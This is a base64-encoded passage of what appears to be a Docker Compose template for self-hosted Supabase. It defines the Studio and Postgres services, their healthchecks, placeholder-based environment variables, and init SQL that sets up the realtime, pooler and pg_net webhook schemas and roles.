LT4gaHR0cDovL3N0dWRpbzozMDAwLyonXG4gICAgdXJsOiBodHRwOi8vc3VwYWJhc2Utc3R1ZGlvOjMwMDAvXG4gICAgcm91dGVzOlxuICAgICAgLSBuYW1lOiBkYXNoYm9hcmQtYWxsXG4gICAgICAgIHN0cmlwX3BhdGg6IHRydWVcbiAgICAgICAgcGF0aHM6XG4gICAgICAgICAgLSAvXG4gICAgcGx1Z2luczpcbiAgICAgIC0gbmFtZTogY29yc1xuICAgICAgLSBuYW1lOiBiYXNpYy1hdXRoXG4gICAgICAgIGNvbmZpZzpcbiAgICAgICAgICBoaWRlX2NyZWRlbnRpYWxzOiB0cnVlXG4iCiAgc3VwYWJhc2Utc3R1ZGlvOgogICAgaW1hZ2U6ICdzdXBhYmFzZS9zdHVkaW86MjAyNS4xMi4xNy1zaGEtNDNmNGY3ZicKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSBub2RlCiAgICAgICAgLSAnLWUnCiAgICAgICAgLSAiZmV0Y2goJ2h0dHA6Ly8xMjcuMC4wLjE6MzAwMC9hcGkvcGxhdGZvcm0vcHJvZmlsZScpLnRoZW4oKHIpID0+IHtpZiAoci5zdGF0dXMgIT09IDIwMCkgdGhyb3cgbmV3IEVycm9yKHIuc3RhdHVzKX0pIgogICAgICB0aW1lb3V0OiA1cwogICAgICBpbnRlcnZhbDogNXMKICAgICAgcmV0cmllczogMwogICAgZGVwZW5kc19vbjoKICAgICAgc3VwYWJhc2UtYW5hbHl0aWNzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBIT1NUTkFNRT0wLjAuMC4wCiAgICAgIC0gJ1NUVURJT19QR19NRVRBX1VSTD1odHRwOi8vc3VwYWJhc2UtbWV0YTo4MDgwJwogICAgICAtICdQT1NUR1JFU19QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9JwogICAgICAtICdERUZBVUxUX09SR0FOSVpBVElPTl9OQU1FPSR7U1RVRElPX0RFRkFVTFRfT1JHQU5JWkFUSU9OOi1EZWZhdWx0IE9yZ2FuaXphdGlvbn0nCiAgICAgIC0gJ0RFRkFVTFRfUFJPSkVDVF9OQU1FPSR7U1RVRElPX0RFRkFVTFRfUFJPSkVDVDotRGVmYXVsdCBQcm9qZWN0fScKICAgICAgLSAnU1VQQUJBU0VfVVJMPWh0dHA6Ly9zdXBhYmFzZS1rb25nOjgwMDAnCiAgICAgIC0gJ1NVUEFCQVNFX1BVQkxJQ19VUkw9JHtTRVJWSUNFX1VSTF9TVVBBQkFTRUtPTkd9JwogICAgICAtICdTVVBBQkFTRV9BTk9OX0tFWT0ke1NFUlZJQ0VfU1VQQUJBU0VBTk9OX0tFWX0nCiAgICAgIC0gJ1NVUEFCQVNFX1NFUlZJQ0VfS0VZPSR7U0VSVklDRV9TVVBBQkFTRVNFUlZJQ0VfS0VZfScKICAgICAgLSAnQVVUSF9KV1RfU0VDUkVUPSR7U0VSVklDRV9QQVNTV09SRF9KV1R9JwogICAgICAtICdMT0dGTEFSRV9BUElfS0VZPSR7U0VSVklDRV9QQVNTV09SRF9MT0dGTEFSRX0nCiAgICAgIC0gJ0xPR0ZMQVJFX1VSTD1odHRwOi8vc3VwYWJhc2UtYW5hbHl0aWNzOjQwMDAnCiAgICAgIC0gJ1NVUEFCQVNFX1BVQkxJQ19BUEk9JHtTRVJWSUNFX1VSTF9TVVBBQkFTRUtPTkd9JwogICAgICAtIE5FWFRfUFVCTElDX0VOQUJMRV9MT0dTPXRydWUKICAgICAgLSBORVhUX0FOQUxZVElDU19CQUNLRU5EX1BST1ZJREVSPXBvc3RncmVzCiAgICAgIC0gJ09QRU5BSV9BUElfS0VZPSR7T1BFTkFJX0FQSV9LRVl9JwogIHN1cGFiYXNlLWRiOgogICAgaW1hZ2U6ICdzdXBhYmFzZS9wb3N0Z3JlczoxNS44LjEuMDQ4JwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6ICdwZ19pc3JlYWR5IC1VIHBvc3RncmVzIC1oIDEyNy4wLjAuMScKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDVzCiAgICAgIHJldHJpZXM6IDEwCiAgICBkZXBlbmRzX29uOgogICAgICBzdXBhYmFzZS12ZWN0b3I6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgIGNvbW1hbmQ6CiAgICAgIC0gcG9zdGdyZXMKICAgICAgLSAnLWMnCiAgICAgIC0gY29uZmlnX2ZpbGU9L2V0Yy9wb3N0Z3Jlc3FsL3Bvc3RncmVzcWwuY29uZgogICAgICAtICctYycKICAgICAgLSBsb2dfbWluX21lc3NhZ2VzPWZhdGFsCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBQT1NUR1JFU19IT1NUPS92YXIvcnVuL3Bvc3RncmVzcWwKICAgICAgLSAnUEdQT1JUPSR7UE9TVEdSRVNfUE9SVDotNTQzMn0nCiAgICAgIC0gJ1BPU1RHUkVTX1BPUlQ9JHtQT1NUR1JFU19QT1JUOi01NDMyfScKICAgICAgLSAnUEdQQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9JwogICAgICAtICdQT1NUR1JFU19QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9JwogICAgICAtICdQR0RBVEFCQVNFPSR7UE9TVEdSRVNfREI6LXBvc3RncmVzfScKICAgICAgLSAnUE9TVEdSRVNfREI9JHtQT1NUR1JFU19EQjotcG9zdGdyZXN9JwogICAgICAtICdKV1RfU0VDUkVUPSR7U0VSVklDRV9QQVNTV09SRF9KV1R9JwogICAgICAtICdKV1RfRVhQPSR7SldUX0VYUElSWTotMzYwMH0nCiAgICB2b2x1bWVzOgogICAgICAtICdzdXBhYmFzZS1kYi1kYXRhOi92YXIvbGliL3Bvc3RncmVzcWwvZGF0YScKICAgICAgLQogICAgICAgIHR5cGU6IGJpbmQKICAgICAgICBzb3VyY2U6IC4vdm9sdW1lcy9kYi9yZWFsdGltZS5zcWwKICAgICAgICB0YXJnZXQ6IC9kb2NrZXItZW50cnlwb2ludC1pbml0ZGIuZC9taWdyYXRpb25zLzk5LXJlYWx0aW1lLnNxbAogICAgICAgIGNvbnRlbnQ6ICJcXHNldCBwZ3VzZXIgYGVjaG8gXCJzdXBhYmFzZV9hZG1pblwiYFxuXG5jcmVhdGUgc2NoZW1hIGlmIG5vdCBleGlzdHMgX3JlYWx0aW1lO1xuYWx0ZXIgc2NoZW1hIF9yZWFsdGltZSBvd25lciB0byA6cGd1c2VyO1xuIgogICAgICAtCiAgICAgICAgdHlwZTogYmluZAogICAgICAgIHNvdXJjZTogLi92b2x1bWVzL2RiL19zdXBhYmFzZS5zcWwKICAgICAgICB0YXJnZXQ6IC9kb2NrZXItZW50cnlwb2ludC1pbml0ZGIuZC9taWdyYXRpb25zLzk3LV9zdXBhYmFzZS5zcWwKICAgICAgICBjb250ZW50OiAiXFxzZXQgcGd1c2VyIGBlY2hvIFwiJFBPU1RHUkVTX1VTRVJcImBcblxuQ1JFQVRFIERBVEFCQVNFIF9zdXBhYmFzZSBXSVRIIE9XTkVSIDpwZ3VzZXI7XG4iCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL3ZvbHVtZXMvZGIvcG9vbGVyLnNxbAogICAgICAgIHRhcmdldDogL2RvY2tlci1lbnRyeXBvaW50LWluaXRkYi5kL21pZ3JhdGlvbnMvOTktcG9vbGVyLnNxbAogICAgICAgIGNvbnRlbnQ6ICJcXHNldCBwZ3VzZXIgYGVjaG8gXCJzdXBhYmFzZV9hZG1pblwiYFxuXFxjIF9zdXBhYmFzZVxuY3JlYXRlIHNjaGVtYSBpZiBub3QgZXhpc3RzIF9zdXBhdmlzb3I7XG5hbHRlciBzY2hlbWEgX3N1cGF2aXNvciBvd25lciB0byA6cGd1c2VyO1xuXFxjIHBvc3RncmVzXG4iCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL3ZvbHVtZXMvZGIvd2ViaG9va3Muc3FsCiAgICAgICAgdGFyZ2V0OiAvZG9ja2VyLWVudHJ5cG9pbnQtaW5pdGRiLmQvaW5pdC1zY3JpcHRzLzk4LXdlYmhvb2tzLnNxbAogICAgICAgIGNvbnRlbnQ6ICJCRUdJTjtcbi0tIENyZWF0ZSBwZ19uZXQgZXh0ZW5zaW9uXG5DUkVBVEUgRVhURU5TSU9OIElGIE5PVCBFWElTVFMgcGdfbmV0IFNDSEVNQSBleHRlbnNpb25zO1xuLS0gQ3JlYXRlIHN1cGFiYXNlX2Z1bmN0aW9ucyBzY2hlbWFcbkNSRUFURSBTQ0hFTUEgc3VwYWJhc2VfZnVuY3Rpb25zIEFVVEhPUklaQVRJT04gc3VwYWJhc2VfYWRtaW47XG5HUkFOVCBVU0FHRSBPTiBTQ0hFTUEgc3VwYWJhc2VfZnVuY3Rpb25zIFRPIHBvc3RncmVzLCBhbm9uLCBhdXRoZW50aWNhdGVkLCBzZXJ2aWNlX3JvbGU7XG5BTFRFUiBERUZBVUxUIFBSSVZJTEVHRVMgSU4gU0NIRU1BIHN1cGFiYXNlX2Z1bmN0aW9ucyBHUkFOVCBBTEwgT04gVEFCTEVTIFRPIHBvc3RncmVzLCBhbm9uLCBhdXRoZW50aWNhdGVkLCBzZXJ2aWNlX3JvbGU7XG5BTFRFUiBERUZBVUxUIFBSSVZJTEVHRVMgSU4gU0NIRU1BIHN1cGFiYXNlX2Z1bmN0aW9ucyBHUkFOVCBBTEwgT04gRlVOQ1RJT05TIFRPIHBvc3RncmVzLCBhbm9uLCBhdXRoZW50aWNhdGVkLCBzZXJ2aWNlX3JvbGU7XG5BTFRFUiBERUZBVUxUIFBSSVZJTEVHRVMgSU4gU0NIRU1BIHN1cGFiYXNlX2Z1bmN0aW9ucyBHUkFOVCBBTEwgT04gU0VRVUVOQ0VTIFRPIHBvc3RncmVzLCBhbm9uLCBhdXRoZW50aWNhdGVkLCBzZXJ2aWNlX3JvbGU7XG4tLSBzdXBhYmFzZV9mdW5jdGlvbnMubWlncmF0aW9ucyBkZWZpbml0aW9uXG5DUkVBVEUgVEFCTEUgc3VwYWJhc2VfZnVuY3Rpb25zLm1pZ3JhdGlvbnMgKFxuICB2ZXJzaW9uIHRleHQgUFJJTUFSWSBLRVksXG4gIGluc2VydGVkX2F0IHRpbWVzdGFtcHR6IE5PVCBOVUxMIERFRkFVTFQgTk9XKClcbik7XG4tLSBJbml0aWFsIHN1cGFiYXNlX2Z1bmN0aW9ucyBtaWdyYXRpb25cbklOU0VSVCBJTlRPIHN1cGFiYXNlX2Z1bmN0aW9ucy5taWdyYXRpb25zICh2ZXJzaW9uKSBWQUxVRVMgKCdpbml0aWFsJyk7XG4tLSBzdXBhYmFzZV9mdW5jdGlvbnMuaG9va3MgZGVmaW5pdGlvblxuQ1JFQVRFIFRBQkxFIHN1cGFiYXNlX2Z1bmN0aW9ucy5ob29rcyAoXG4gIGlkIGJpZ3NlcmlhbCBQUklNQVJZIEtFWSxcbiAgaG9va190YWJsZV9pZCBpbnRlZ2VyIE5PVCBOVUxMLFxuICBob29rX25hbWUgdGV4dCBOT1QgTlVMTCxcbiAgY3JlYXRlZF9hdCB0aW1lc3RhbXB0eiBOT1QgTlVMTCBERUZBVUxUIE5PVygpLFxuICByZXF1ZXN0X2lkIGJpZ2ludFxuKTtcbkNSRUFURSBJTkRFWCBzdXBhYmFzZV9mdW5jdGlvbnNfaG9va3NfcmVxdWVzdF9pZF9pZHggT04gc3VwYWJhc2VfZnVuY3Rpb25zLmhvb2tzIFVTSU5HIGJ0cmVlIChyZXF1ZXN0X2lkKTtcbkNSRUFURSBJTkRFWCBzdXBhYmFzZV9mdW5jdGlvbnNfaG9va3NfaF90YWJsZV9pZF9oX25hbWVfaWR4IE9OIHN1cGFiYXNlX2Z1bmN0aW9ucy5ob29rcyBVU0lORyBidHJlZSAoaG9va190YWJsZV9pZCwgaG9va19uYW1lKTtcbkNPTU1FTlQgT04gVEFCTEUgc3VwYWJhc2VfZnVuY3Rpb25zLmhvb2tzIElTICdTdXBhYmFzZSBGdW5jdGlvbnMgSG9va3M6IEF1ZGl0IHRyYWlsIGZvciB0cmlnZ2VyZWQgaG9va3MuJztcbkNSRUFURSBGVU5DVElPTiBzdXBhYmFzZV9mdW5jdGlvbnMuaHR0cF9yZXF1ZXN0KClcbiAgUkVUVVJOUyB0cmlnZ2VyXG4gIExBTkdVQUdFIHBscGdzcWxcbiAgQVMgJGZ1bmN0aW9uJFxuICBERUNMQVJFXG4gICAgcmVxdWVzdF9pZCBiaWdpbnQ7XG4gICAgcGF5bG9hZCBqc29uYjtcbiAgICB1cmwgdGV4dCA6PSBUR19BUkdWWzBdOjp0ZXh0O1xuICAgIG1ldGhvZCB0ZXh0IDo9IFRHX0FSR1ZbMV06OnRleHQ7XG4gICAgaGVhZGVycyBqc29uYiBERUZBVUxUICd7fSc6Ompzb25iO1xuICAgIHBhcmFtcyBqc29uYiBERUZBVUxUICd7fSc6Ompzb25iO1xuICAgIHRpbWVvdXRfbXMgaW50ZWdlciBERUZBVUxUIDEwMDA7XG4gIEJFR0lOXG4gICAgSUYgdXJsIElTIE5VTEwgT1IgdXJsID0gJ251bGwnIFRIRU5cbiAgICAgIFJBSVNFIEVYQ0VQVElPTiAndXJsIGFyZ3VtZW50IGlzIG1pc3NpbmcnO1xuICAgIEVORCBJRjtcblxuICAgIElGIG1ldGhvZCBJUyBOVUxMIE9SIG1ldGhvZCA9ICdudWxsJyBUSEVOXG4gICAgICBSQUlTRSBFWENFUFRJT04gJ21ldGhvZCBhcmd1bWVudCBpcyBtaXNzaW5nJztcbiAgICBFTkQgSUY7XG5cbiAgICBJRiBUR19BUkdWWzJdIElTIE5VTEwgT1IgVEdfQVJHVlsyXSA9ICdudWxsJyBUSEVOXG4gICAgICBoZWFkZXJzID0gJ3tcIkNvbnRlbnQtVHlwZVwiOiBcImFwcGxpY2F0aW9uL2pzb25cIn0nOjpqc29uYjtcbiAgICBFTFNFXG4gICAgICBoZWFkZXJzID0gVEdfQVJHVlsyXTo6anNvbmI7XG4gICAgRU5EIElGO1xuXG4gICAgSUYgVEdfQVJHVlszXSBJUyBOVUxMIE9SIFRHX0FSR1ZbM10gPSAnbnVsbCcgVEhFTlxuICAgICAgcGFyYW1zID0gJ3t9Jzo6anNvbmI7XG4gICAgRUxTRVxuICAgICAgcGFyYW1zID0gVEdfQVJHVlszXTo6anNvbmI7XG4gICAgRU5EIElGO1xuXG4gICAgSUYgVEdfQVJHVls0XSBJUyBOVUxMIE9SIFRHX0FSR1ZbNF0gPSAnbnVsbCcgVEhFTlxuICAgICAgdGltZW91dF9tcyA9IDEwMDA7XG4gICAgRUxTRVxuICAgICAgdGltZW91dF9tcyA9IFRHX0FSR1ZbNF06OmludGVnZXI7XG4gICAgRU5EIElGO1xuXG4gICAgQ0FTRVxuICAgICAgV0hFTiBtZXRob2QgPSAnR0VUJyBUSEVOXG4gICAgICAgIFNFTEVDVCBodHRwX2dldCBJTlRPIHJlcXVlc3RfaWQgRlJPTSBuZXQuaHR0cF9nZXQoXG4gICAgICAgICAgdXJsLFxuICAgICAgICAgIHBhcmFtcyxcbiAgICAgICAgICBoZWFkZXJzLFxuICAgICAgICAgIHRpbWVvdXRfbXNcbiAgICAgICAgKTtcbiAgICAgIFdIRU4gbWV0aG9kID0gJ1BPU1QnIFRIRU5cbiAgICAgICAgcGF5bG9hZCA9IGpzb25iX2J1aWxkX29iamVjdChcbiAgICAgICAgICAnb2xkX3JlY29yZCcsIE9MRCxcbiAgICAgICAgICAncmVjb3JkJywgTkVXLFxuICAgICAgICAgICd0eXBlJywgVEdfT1AsXG4gICAgICAgICAgJ3RhYmxlJywgVEdfVEFCTEVfTkFNRSxcbiAgICAgICAgICAnc2NoZW1hJywgVEdfVEFCTEVfU0NIRU1BXG4gICAgICAgICk7XG5cbiAgICAgICAgU0VMRUNUIGh0dHBfcG9zdCBJTlRPIHJlcXVlc3RfaWQgRlJPTSBuZXQuaHR0cF9wb3N0KFxuICAgICAgICAgIHVybCxcbiAgICAgICAgICBwYXlsb2FkLFxuICAgICAgICAgIHBhcmFtcyxcbiAgICAgICAgICBoZWFkZXJzLFxuICAgICAgICAgIHRpbWVvdXRfbXNcbiAgICAgICAgKTtcbiAgICAgIEVMU0VcbiAgICAgICAgUkFJU0UgRVhDRVBUSU9OICdtZXRob2QgYXJndW1lbnQgJSBpcyBpbnZhbGlkJywgbWV0aG9kO1xuICAgIEVORCBDQVNFO1xuXG4gICAgSU5TRVJUIElOVE8gc3VwYWJhc2VfZnVuY3Rpb25zLmhvb2tzXG4gICAgICAoaG9va190YWJsZV9pZCwgaG9va19uYW1lLCByZXF1ZXN0X2lkKVxuICAgIFZBTFVFU1xuICAgICAgKFRHX1JFTElELCBUR19OQU1FLCByZXF1ZXN0X2lkKTtcblxuICAgIFJFVFVSTiBORVc7XG4gIEVORFxuJGZ1bmN0aW9uJDtcbi0tIFN1cGFiYXNlIHN1cGVyIGFkbWluXG5ET1xuJCRcbkJFR0lOXG4gIElGIE5PVCBFWElTVFMgKFxuICAgIFNFTEVDVCAxXG4gICAgRlJPTSBwZ19yb2xlc1xuICAgIFdIRVJFIHJvbG5hbWUgPSAnc3VwYWJhc2VfZnVuY3Rpb25zX2FkbWluJ1xuICApXG4gIFRIRU5cbiAgICBDUkVBVEUgVVNFUiBzdXBhYmFzZV9mdW5jdGlvbnNfYWRtaW4gTk9JTkhFUklUIENSRUFURVJPTEUgTE9HSU4gTk9SRVBMSUNBVElPTjtcbiAgRU5EIElGO1xuRU5EXG4kJDtcbkdSQU5UIEFMTCBQUklWSUxFR0VTIE9OIFNDSEVNQSBzdXBhYmFzZV9mdW5jdGlvbnMgVE8gc3VwYWJhc2VfZnVuY3Rpb25zX2FkbWluO1xuR1JBTlQgQUxMIFBSSVZJTEVHRVMgT04gQUxMIFRBQkxFUyBJTiBTQ0hFTUEgc3VwYWJhc2VfZnVuY3Rpb25zIFRPIHN1cGFiYXNlX2Z1bmN0aW9uc19hZG1pbjtcbkdSQU5UIEFMTCBQUklWSUxFR0VTIE9OIEFMTCBTRVFVRU5DRVMgSU4gU0NIRU1BIHN1cGFiYXNlX2Z1bmN0aW9ucyBUTyBzdXBhYmFzZV9mdW5jdGlvbnNfYWRtaW47XG5BTFRFUiBVU0VSIHN1cGFiYXNlX2Z1bmN0aW9uc19hZG1pbiBTRVQgc2VhcmNoX3BhdGggPSBcInN1cGFiYXNlX2Z1bmN0aW9uc1wiO1xuQUxURVIgdGFibGUgXCJzdXBhYmFzZV9mdW5jdGlvbnNcIi5taWdyYXRpb25zIE9XTkVSIFRPIHN1cGFiYXNlX2Z1bmN0aW9uc19hZG1pbjtcbkFMVEVSIHRhYmxlIFwic3VwYWJhc2VfZnVuY3Rpb25zXCIuaG9va3MgT1dORVIgVE8gc3VwYWJhc2VfZnVuY3Rpb25zX2FkbWluO1xuQUxURVIgZnVuY3Rpb24gXCJzdXBhYmFzZV9mdW5jdGlvbnNcIi5odHRwX3JlcXVlc3QoKSBPV05FUiBUTyBzdXBhYmFzZV9mdW5jdGlvbnNfYWRtaW47XG5HUkFOVCBzdXBhYmFzZV9mdW5jdGlvbnNfYWRtaW4gVE8gcG9zdGdyZXM7XG4tLSBSZW1vdmUgdW51c2VkIHN1cGFiYXNlX3BnX25ldF9hZG1pbiByb2xlXG5ET1xuJCRcbkJFR0lOXG4gIElGIEVYSVNUUyAoXG4gICAgU0VMRUNUIDFcbiAgICBGUk9NIHBnX3JvbGVzXG4gICAgV0hFUkUgcm9sbmFtZSA9ICdzdXBhYmFzZV9wZ19uZXRfYWRtaW4nXG4gIClcbiAgVEhFTlxuICAgIFJFQVNTSUdOIE9XTkVEIEJZIHN1cGFiYXNlX3BnX25ldF9hZG1pbiBUTyBzdXBhYmFzZV9hZG1pbjtcbiAgICBEUk9QIE9XTkVEIEJZIHN1cGFiYXNlX3BnX25ldF9hZG1pbjtcbiAgICBEUk9QIFJPTEUgc3VwYWJhc2VfcGdfbmV0X2FkbWluO1xuICBFTkQgSUY7XG5FTkRcbiQkO1xuLS0gcGdfbmV0IGdyYW50cyB3aGVuIGV4dGVuc2lvbiBpcyBhbHJlYWR5IGVuYWJsZWRcbkRPXG4kJFxuQkVHSU5cbiAgSUYgRVhJU1RTIChcbiAgICBTRUxFQ1QgMVxuICAgIEZST00gcGdfZXh0ZW5zaW9uXG4gICAgV0hFUkUgZXh0bmFtZSA9ICdwZ19uZXQnXG4gIClcbiAgVEhFTlxuICAgIEdSQU5UIFVTQUdFIE9OIFNDSEVNQSBuZXQgVE8gc3VwYWJhc2VfZnVuY3Rpb25zX2FkbWluLCBwb3N0Z3JlcywgYW5vbiwgYXV0aGVudGljYXRlZCwgc2VydmljZV9yb2xlO1xuICAgIEFMVEVSIGZ1bmN0aW9uIG5ldC5odHRwX2dldCh1cmwgdGV4dCwgcGFyYW1zIGpzb25iLCBoZWFkZXJzIGpzb25iLCB0aW1lb3V0X21pbGxpc2Vjb25kcyBpbnRlZ2VyKSBTRUNVUklUWSBERUZJTkVSO1xuICAgIEFMVEVSIGZ1bmN0aW9uIG5ldC5odHRwX3Bvc3QodXJsIHRleHQsIGJvZHkganNvbmIsIHBhcmFtcyBqc29uYiwgaGVhZGVycyBqc29uYiwgdGltZW91dF9taWxsaXNlY29uZHMgaW50ZWdlcikgU0VDVVJJVFkgREVGSU5FUjtcbiAgICBBTFRFUiBmdW5jdGlvbiBuZXQuaHR0cF9nZXQodXJsIHRleHQsIHBhcmFtcyBqc29uYiwgaGVhZGVycyBqc29uYiwgdGltZW91dF9taWxsaXNlY29uZHMgaW50ZWdlcikgU0VUIHNlYXJjaF9wYXRoID0gbmV0O1xuICAgIEFMVEVSIGZ1bmN0aW9uIG5ldC5odHRwX3Bvc3QodXJsIHRleHQsIGJvZHkganNvbmIsIHBhcmFtcyBqc29uYiwgaGVhZGVycyBqc29uYiwgdGltZW91dF9taWxsaXNlY29uZHMgaW50ZWdlcikgU0VUIHNlYXJjaF9wYXRoID0gbmV0O1xuICAgIFJFVk9LRSBBTEwgT04gRlVOQ1RJT04gbmV0Lmh0dHBfZ2V0KHVybCB0ZXh0LCBwYXJhbXMganNvbmIsIGhlYWRlcnMganNvbmIsIHRpbWVvdXRfbWlsbGlzZWNvbmRzIGludGVnZXIpIEZST00gUFVCTElDO1xuICAgIFJFVk9LRSBBTEwgT04gRlVOQ1RJT04gbmV0Lmh0dHBfcG9zdCh1cmwgdGV4dCwgYm9keSBqc29uYiwgcGFyYW1zIGpzb25iLCBoZWFkZXJzIGpzb25iLCB0aW1lb3V0X21pbGxpc2Vjb25kcyBpbnRlZ2VyKSBGUk9NIFBVQkxJQztcbiAgICBHUkFOVCBFWEVDVVRFIE9OIEZVTkNUSU9OIG5ldC5odHRwX2dldCh1cmwgdGV4dCwgcGFyYW1zIGpzb25iLCBoZWFkZXJzIGpzb25iLCB0aW1lb3V0X21pbGxpc2Vjb25kcyBpbnRlZ2VyKSBUTyBzdXBhYmFzZV9mdW5jdGlvbnNfYWRtaW4sIHBvc3RncmVzLCBhbm9uLCBhdXRoZW50aWNhdGVkLCBzZXJ2aWNlX3JvbGU7XG4gICAgR1JBTlQgRVhFQ1VURSBPTiBGVU5DVElPTiBuZXQuaHR0cF9wb3N0KHVybCB0ZXh0LCBib2R5IGpzb25iLCBwYXJhbXMganNvbmIsIGhlYWRlcnMganNvbmIsIHRpbWVvdXRfbWlsbGlzZWNvbmRzIGludGVnZXIpIFRPIHN1cGFiYXNlX2Z1bmN0aW9uc19hZG1pbiwgcG9zdGdyZXMsIGFub24sIGF1dGhlbnRpY2F0ZWQsIHNlcnZpY2Vfcm9sZTtcbiAgRU5EIElGO1xuRU5EXG4kJDtcbi0tIEV2ZW50IHRyaWdnZXIgZm9yIHBnX25ldFxuQ1JFQVRFIE9SIFJFUExBQ0UgRlVOQ1RJT04gZXh0ZW5zaW9ucy5ncmFudF9wZ19uZXRfYWNjZXNzKClcblJFVFVSTlMgZXZlbnRfdHJpZ2dlclxuTEFOR1VBR0UgcGxwZ3NxbFxuQVMgJCRcbkJFR0lOXG4gIElGIEVYSVNUUyAoXG4gICAgU0VMRUNUIDFcbiAgICBGUk9NIHBnX2V2ZW50X3RyaWdnZXJfZGRsX2NvbW1hbmRzKCkgQVMgZXZcbiAgICBKT0lOIHBnX2V4dGVuc2lvbiBBUyBleHRcbiAgICBPTiBldi5vYmppZCA9IGV4dC5vaWRcbiAgICBXSEVSRSBleHQuZXh0bmFtZSA9ICdwZ19uZXQnXG4gIClcbiAgVEhFTlxuICAgIEdSQU5UIFVTQUdFIE9OIFNDSEVNQSBuZXQgVE8gc3VwYWJhc2VfZnVuY3Rpb25zX2FkbWluLCBwb3N0Z3JlcywgYW5vbiwgYXV0aGVudGljYXRlZCwgc2VydmljZV9yb2xlO1xuICAgIEFMVEVSIGZ1bmN0aW9uIG5ldC5odHRwX2dldCh1cmwgdGV4dCwgcGFyYW1zIGpzb25iLCBoZWFkZXJzIGpzb25iLCB0aW1lb3V0X21pbGxpc2Vjb25kcyBpbnRlZ2VyKSBTRUNVUklUWSBERUZJTkVSO1xuICAgIEFMVEVSIGZ1bmN0aW9uIG5ldC5odHRwX3Bvc3QodXJsIHRleHQsIGJvZHkganNvbmIsIHBhcmFtcyBqc29uYiwgaGVhZGVycyBqc29uYiwgdGltZW91dF9taWxsaXNlY29uZHMgaW50ZWdlcikgU0VDVVJJVFkgREVGSU5FUjtcbiAgICBBTFRFUiBmdW5jdGlvbiBuZXQuaHR0cF9nZXQodXJsIHRleHQsIHBhcmFtcyBqc29uYiwgaGVhZGVycyBqc29uYiwgdGltZW91dF9taWxsaXNlY29uZHMgaW50ZWdlcikgU0VUIHNlYXJjaF9wYXRoID0gbmV0O1xuICAgIEFMVEVSIGZ1bmN0aW9uIG5ldC5odHRwX3Bvc3QodXJsIHRleHQsIGJvZHkganNvbmIsIHBhcmFtcyBqc29uYiwgaGVhZGVycyBqc29uYiwgdGltZW91dF9taWxsaXNlY29uZHMgaW50ZWdlcikgU0VUIHNlYXJjaF9wYXRoID0gbmV0O1xuICAgIFJFVk9LRSBBTEwgT04gRlVOQ1RJT04gbmV0Lmh0dHBfZ2V0KHVybCB0ZXh0LCBwYXJhbXMganNvbmIsIGhlYWRlcnMganNvbmIsIHRpbWVvdXRfbWlsbGlzZWNvbmRzIGludGVnZXIpIEZST00gUFVCTElDO1xuICAgIFJFVk9LRSBBTEwgT04gRlVOQ1RJT04gbmV0Lmh0dHBfcG9zdCh1cmwgdGV4dCwgYm9keSBqc29uYiwgcGFyYW1zIGpzb25iLCBoZWFkZXJzIGpzb25iLCB0aW1lb3V0X21pbGxpc2Vjb25kcyBpbnRlZ2VyKSBGUk9NIFBVQkxJQztcbiAgICBHUkFOVCBFWEVDVVRFIE9OIEZVTkNUSU9OIG5ldC5odHRwX2dldCh1cmwgdGV4dCwgcGFyYW1zIGpzb25iLCBoZWFkZXJzIGpzb25iLCB0aW1lb3V0X21pbGxpc2Vjb25kcyBpbnRlZ2VyKSBUTyBzdXBhYmFzZV9mdW5jdGlvbnNfYWRtaW4sIHBvc3RncmVzLCBhbm9uLCBhdXRoZW50aWNhdGVkLCBzZXJ2aWNlX3JvbGU7XG4gICAgR1JBTlQgRVhFQ1VURSBPTiBGVU5DVElPTiBuZXQuaHR0cF9wb3N0KHVybCB0ZXh0LCBib2R5IGpzb25iLCBwYXJhbXMganNvbmIsIGhlYWRlcnMganNvbmIsIHRpbWVvdXRfbWlsbGlzZWNvbmRzIGludGVnZXIpIFRPIHN1cGFiYXNlX2Z1bmN0aW9uc19hZG1pbiwgcG9zdGdyZXMsIGFub24sIGF1dGhlbnRpY2F0ZWQsIHNlcnZpY2Vfcm9sZTtcbiAgRU5EIElGO1xuRU5EO1xuJCQ7XG5DT01NRU5UIE9OIEZVTkNUSU9OIGV4dGVuc2lvbnMuZ3JhbnRfcGdfbmV0X2FjY2VzcyBJUyAnR3JhbnRzIGFjY2VzcyB0byBwZ19uZXQnO1xuRE9cbiQkXG5CRUdJTlxuICBJRiBOT1QgRVhJU1RTIChcbiAgICBTRUxFQ1QgMVxuICAgIEZST00gcGdfZXZlbnRfdHJpZ2dlclxuICAgIFdIRVJFIGV2dG5hbWUgPSAnaXNzdWVfcGdfbmV0X2FjY2VzcydcbiAgKSBUSEVOXG4gICAgQ1JFQVRFIEVWRU5UIFRSSUdHRVIgaXNzdWVfcGdfbmV0X2FjY2VzcyBPTiBkZGxfY29tbWFuZF9lbmQgV0hFTiBUQUcgSU4gKCdDUkVBVEUgRVhURU5TSU9OJylcbiAgICBFWEVDVVRFIFBST0NFRFVSRSBleHRlbnNpb25zLmdyYW50X3BnX25ldF9hY2Nlc3MoKTtcbiAgRU5EIElGO1xuRU5EXG4kJDtcbklOU0VSVCBJTlRPIHN1cGFiYXNlX2Z1bmN0aW9ucy5taWdyYXRpb25zICh2ZXJzaW9uKSBWQUxVRVMgKCcyMDIxMDgwOTE4MzQyM191cGRhdGVfZ3JhbnRzJyk7XG5BTFRFUiBmdW5jdGlvbiBzdXBhYmFzZV9mdW5jdGlvbnMuaHR0cF9yZXF1ZXN0KCkgU0VDVVJJVFkgREVGSU5FUjtcbkFMVEVSIGZ1bmN0aW9uIHN1cGFiYXNlX2Z1bmN0aW9ucy5odHRwX3JlcXVlc3Q